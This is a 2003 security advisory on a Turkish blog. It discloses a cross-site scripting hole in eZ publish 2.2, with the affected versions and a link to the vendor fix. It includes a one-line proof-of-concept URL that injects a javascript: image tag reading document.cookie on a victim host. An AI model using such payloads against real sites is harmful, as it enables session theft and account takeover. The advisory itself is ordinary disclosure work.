EzPublish "Directory" XSS Vulnerability
20.07.2003
Okuyucu : 3.765
Günlük Okuyucu : 2,1
Okuyucu : 3.765
Günlük Okuyucu : 2,1
------------------------------------------------------ EzPublish "Directory" XSS Vulnerability ------------------------------------------------------ Any attacker may access other users/admin accounts. ------------------------------------------------------ About Ezpublish; ------------------------------------------------------ PHP Based Content Management System Vendor : http://ez.no Demo : http://publishdemo.ez.no/ ------------------------------------------------------ Vulnerable; ------------------------------------------------------ eZ publish 2.2 ------------------------------------------------------ Not Vulnerable; ------------------------------------------------------ eZ publish 3 ------------------------------------------------------ Solution; ------------------------------------------------------ File provided by vendor; http://www.securityfocus.com/archive/attachment/321714/2/ ------------------------------------------------------ Exploit; ------------------------------------------------------ http://[victim]/index.php/article/articleview/<img%20src="javascript:alert(document.cookie)"> ------------------------------------------------------ Published; ------------------------------------------------------ May 16 2003 3:22AM Ferruh Mavituna Web Application Security Specialist http://ferruh.mavituna.com
Yorumlar
Aşağıdaki form aracılığı ile yorumlarınızı ve fikirlerinizi gönderebilirsiniz. Henüz bu konu hakkında bir yorum yazılmamış.
Yorum Ekle
Diğer Yazılar
Fallout 3 için imza kampanyası
Fallout 3, Beklenen kişi mi? Yoksa hüsran mı olacak...
Fallout MMORPG!
Fallout ve Black Isle' ın Sonu !, Peki Fallout ?
fark-eting
Fast way to extract data from Error Based SQL Injections
Fastsum Md5 Checksum Aracı
Favicon Kullanmanız İçin Bir Neden daha
Faydalı Program Arşivi
FazlaMesai şekilde yenilenmeye gitmiş
Ferrarisini Satan Kazma ve Yedi Cüce
Ferruh Mavituna Firefox RSS Desteği
Fifa Hacklenmiş
Film (DivX) Önizleme ve Explorer CPU Faciası
Film Sesleri
Findstr Windows için Grep(miş)
Firefox 1 Final ve Yenilikler
Firefox 1.0 PR, Neler Yeni ?, hmmm...
Firefox Açıkları
Neredeyim ?
Ferruh.Mavituna » Advisories » EzPublish "Directory" XSS Vulnerability